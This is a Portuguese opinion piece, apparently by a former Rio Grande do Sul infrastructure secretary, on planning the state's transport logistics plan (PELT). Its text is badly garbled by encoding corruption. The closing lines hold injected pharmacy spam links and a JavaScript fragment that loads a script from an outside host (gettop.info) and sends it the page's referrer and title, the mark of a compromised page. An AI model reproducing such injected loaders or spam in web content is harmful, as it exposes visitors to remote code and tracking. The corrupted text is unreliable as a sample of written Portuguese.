Plano Estadual de LogAi??stica: planejamento de polAi??ticas de infraestrutura e intermodalidade

Oct 29 2013
(0) Comments

Beto Albuquerque Ai?? ex-secretA?rio dos Transportes e de Infraestrutura e LogAi??stica. Foto: SAi??rgio FrancA?s

A falta de planejamento e de investimento pA?blico, durante vA?rias dAi??cadas, produziu o caos atual no setor de infraestrutura de transportes. O resultado dessa ausA?ncia de planejamento Ai?? o desperdAi??cio e o encarecimento do custo logAi??stico, que no RS Ai?? significativamente acima da mAi??dia nacional. Atualmente, 85,3% do escoamento de nossa produAi??A?o Ai?? transportado pelas rodovias, o que tambAi??m acarreta em um alto custo de manutenAi??A?o das estradas.

Diante deste quadro, ao assumir a Secretaria de Infraestrutura e LogAi??stica do RS e tendo em vista os financiamentos a serem contratados pelo governo, dei inAi??cio Ai?? elaboraAi??A?o do Plano Estadual de LogAi??stica de Transporte (PELT), tambAi??m levando em consideraAi??A?o o trabalho jA? desenvolvido pelas FederaAi??Ai??es de IndA?strias dos Estados do Sul, o Sul Competitivo, que aborda eixos e obras-chave para o aumento de competitividade dos estados do Sul.

O PELT tem por objetivos diagnosticar as deficiA?ncias e gargalos do sistema logAi??stico, planejar cenA?rios futuros e definir estratAi??gias de intervenAi??A?o pA?blica e privadas. A ideia Ai?? implementar polAi??ticas pA?blicas para o transporte de cargas, com a definiAi??A?o de vias mais econA?micas e racionais, baseadas na intermodalidade, e que, paralelo a isso, assegure o desenvolvimento econA?mico e social das regiAi??es.

Desta forma, Ai?? possAi??vel conhecer as carA?ncias e necessidades dos modais hidroviA?rio, ferroviA?rio, dutoviA?rio, rodoviA?rio e aeroviA?rio e apontar soluAi??Ai??es da matriz de transporte mais adequada para os prA?ximos anos. Este projeto, contratado via consultoria e subsidiado pelo Banco Mundial, jA? estA? em fase de contrataAi??A?o.

O Plano pretende nortear as aAi??Ai??es no setor a curto (5 anos), mAi??dio (10 anos) e longo prazos (nos prA?ximos 25 anos). Para isso, disponibilizarA? ferramentas adequadas para a implementaAi??A?o de um sistema dinA?mico e interativo, junto aos operadores do sistema de transportes de cargas, bem como a capacitaAi??A?o do quadro de pessoal no seu gerenciamento.

Com visA?o ampla dos fluxos de cargas nos diversos modais e em tempo real, os governos verificarA?o a necessidade de investimentos, com vistas a atender ao aumento da produtividade, reduzir os custos com a movimentaAi??A?o, garantir maior seguranAi??a e, por consequA?ncia, resultados positivos ao Estado.

Nossos esforAi??os para a elaboraAi??A?o do PELT nos deixam convictos de que este plano contribuirA? muito para a criaAi??A?o de um marco regulatA?rio de transportes, atAi?? entA?o inexistente, planejado nos cenA?rios a curto, mAi??dio e longo prazos, e adequado Ai?? realidade e a necessidade do desenvolvimento do nosso RS.

Deputado federal, ex-secretA?rio de Infraestrutura e LogAi??stica do RS buy allopurinol online canada s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; clarinex generic equivalent http://grafikontrol-gmbh.de/?p=539 http://www.zombiecommand.com/zombies/cheap-copegus-prescribing/